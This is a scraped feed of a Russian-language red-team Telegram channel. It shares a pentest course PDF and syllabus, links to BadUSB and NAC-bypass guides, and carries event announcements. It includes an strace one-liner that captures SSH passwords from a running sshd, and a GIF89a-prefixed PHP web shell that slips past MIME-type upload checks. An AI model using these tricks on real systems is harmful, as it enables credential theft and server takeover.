OSWE FROM @RESOLUTE-ATTACK.pdf
22.1 MB
Учебная программа [OSWE]:
Инструменты и методологии веб-безопасности
Анализ исходного кода
Постоянный межсайтовый скриптинг
Перехват сеанса
Десериализация .NET
Удаленное выполнение кода
Слепые SQL-инъекции
Эксфильтрация данных
Обход ограничений на загрузку файлов и фильтров расширений файлов
Жонглирование типами PHP с помощью свободных сравнений
Расширение PostgreSQL и определяемые пользователем функции
Обход ограничений регулярных выражений
Волшебные хэши
Обход ограничений на символы
Обратные оболочки UDF
Большие объекты PostgreSQL
Межсайтовый скриптинг на основе DOM (черный ящик)
Внедрение шаблона на стороне сервера
Слабая генерация случайных токенов
Слабая генерация случайных токенов
Внедрение внешней сущности XML
RCE через функции базы данных
Внедрение команд операционной системы через WebSockets (черный ящик)
Пароль:
#Курсы
Инструменты и методологии веб-безопасности
Анализ исходного кода
Постоянный межсайтовый скриптинг
Перехват сеанса
Десериализация .NET
Удаленное выполнение кода
Слепые SQL-инъекции
Эксфильтрация данных
Обход ограничений на загрузку файлов и фильтров расширений файлов
Жонглирование типами PHP с помощью свободных сравнений
Расширение PostgreSQL и определяемые пользователем функции
Обход ограничений регулярных выражений
Волшебные хэши
Обход ограничений на символы
Обратные оболочки UDF
Большие объекты PostgreSQL
Межсайтовый скриптинг на основе DOM (черный ящик)
Внедрение шаблона на стороне сервера
Слабая генерация случайных токенов
Слабая генерация случайных токенов
Внедрение внешней сущности XML
RCE через функции базы данных
Внедрение команд операционной системы через WebSockets (черный ящик)
Пароль:
RESOLUTE ATTACK
EAGER7 | SUBSCRIBE#Курсы
🔥17⚡15👍6😱3❤1😍1
Недавно в мои руки, наконец, попала такая игрушка как Flipper Zero. Копаясь в функционале, обнаружил там утилиту BadUSB. Сам по себе BadUSB - это вектор атак, суть которого заключается в эмуляции системой работы клавиатуры или выполнения любых операций на ПК жертвы под видом обычного юзера
Читать
#Инструменты #Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Rubber Ducky/BadUSB
Всем привет, друзья, с вами E1tex! Сегодня мы с вами узнаем, что такое Rubber Ducky, научимся писать скрипты на языке Ducky Script. Что такое BadUSB?Недавно в мои руки, наконец, попала такая игрушка как Flipper Zero. Копаясь в функционале, обнаружил там утилиту…
👍16❤7🔥3⚡1
Уже через час🔥
В докладе мы разберём тему:
"Внутрянка с точки зрения пентестера".
Разберем такие моменты как: пассивный анализ трафика, активная разведка, основные атаки на ActiveDirectory, извлечение информации из LDAP, пивотинг
Канал спикера - https://t.me/pathsecure
Кирилл является специалистом в сфере этичного хакинга. Он уже успел выступить со своими докладами на:
Конференциях OffZone2022, HackConf, PermSecurityMeetup, КодИБ, а также в сообществах Хакердом и DC7342
#Тестирование #Внутрянка
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡9❤4🔥4
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Внутрянка с точки зрения пентестера | Path Secure
В докладе мы разберём тему: " Внутрянка с точки зрения пентестера".
Разберём такие моменты как: пассивный анализ трафика, активная разведка, основные атаки на ActiveDirectory, извлечение информации из LDAP, пивотинг
Спикер: Кирилл Филимонов ( Curiv )
Канал…
Разберём такие моменты как: пассивный анализ трафика, активная разведка, основные атаки на ActiveDirectory, извлечение информации из LDAP, пивотинг
Спикер: Кирилл Филимонов ( Curiv )
Канал…
🔥11👍6❤3😱1
Мы решили сделать ребрендинг, потому что мы выбрали вектор, по которому будем двигаться - RED TEAM. И хотим быть максимально близки, даже по названию.
У чёрной розы множество значений, в нашем же случае значение могущества, отваги и борьбы со страхом.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍53🔥17❤9🤣3⚡2😈2
Какой бы ни была причина, сокрытие вашей личности в сети на уровне Ethernet дает значительные преимущества при внутренней оценке безопасности.
Одним из практических способов добиться этого является использование метода, который мы любим называть «Ethernet Ghosting», когда законное устройство в сети используется в качестве маски для маскировки связи с устройством злоумышленника.
Читать
#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Призрачный Ethernet & Обход NAC – Практический обзор
Всем привет! С вами wr3dmast3r, и сегодня мы узнаем как использовать наше устройство в режиме призрака на уровне ethernet. Введение Даже при наличии прямого физического доступа к сети (клиент вручает вам кабель локальной сети) некоторые оценки безопасности…
❤15⚡8👍7🔥7
Теперь ветка в нашем чате кибер ивенты будет активно заполняться.
#CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15🔥8⚡3👍3
Предлагаем вам посетить ближайший их ивент
AM Live: Аппаратное обеспечение для российского ИБ
📅14 декабря, СР, 11:00
В прямом эфире обсудим:
🔸Сможет ли рынок информационной безопасности адаптироваться к новой реальности?
🔸Получится ли избежать тотального дефицита оборудования?
🔸 Россия не производит современные микропроцессоры, чипы памяти, СХД и много чего еще. Есть ли шансы это исправить?
🔸Спрос и предложение на аппаратное обеспечение для ИБ
Модератор:
🔸Руслан Иванов, Директор офиса развития инфраструктуры стратегических корпоративных заказчиков «Ростелеком-Солар»
Спикеры:
🔸Павел Коростелев, Руководитель отдела продвижения продуктов «Код Безопасности»
🔸Карина Абагян, Директор по стратегическому развитию
АО "Микрон"
🔸Сергей Плотко, Директор по аналитике и интеграции АО "НПП "Цифровые решения"
🔸Константин Закатов, Руководитель Департамента информационной безопасности ООО «ПК АКВАРИУС»
Принять участие
#Разное
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡9🔥8👍2
This media is not supported in your browser
VIEW IN TELEGRAM
RESOLUTE ATTACK
Строчит курс PRTT 😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣35❤6👍4
Forwarded from SecuriXy.kz
Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
2. Отслеживаем системные вызовы
Ну или одной строкой
#ssh #sniff #password
Так сказать мир был до этой новости и теперь…
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture
Ну или одной строкой
strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture
#ssh #sniff #password
❤18🔥9⚡4👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Scraping директорий на Python
Всем привет! С вами wr3dmast3r, и сегодня мы напишем простой скрапер директорий сайта. Приступим.
🔥17⚡6👍5
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
WriteUpTHM - 0day
Всем привет! С вами wr3dmast3r, и сегодня мы разберем ctf с tryhackme. Содержание Запуск Nikto, чтобы найти точку входа Ошибка, которая показывает, что страница уязвима для shellshock Выполнение Curl запроса к веб-серверу Однострочная обратная оболочка с…
❤17🔥12👍6
Можно обмануть проверку безопасности mime-типа, чтобы думать, что загруженный файл является изображением, но на самом деле веб-сервер распознает его как файл скрипта PHP.
Для этого нам нужно добавить только одну строку в начале нашего скрипта:
GIF89a;
GIF89a - это заголовок файла GIF. Когда файл просматривается, mime_content_type("myfile");он вводится в заблуждение, чтобы думать, что это изображение, а не оболочка PHP.GIF89a;
<?php
system('whoami'); # shellcode goes here
?>
RESOLUTE ATTACK#Обход
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17👍11🔥6😍3🤣3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍5❤4⚡2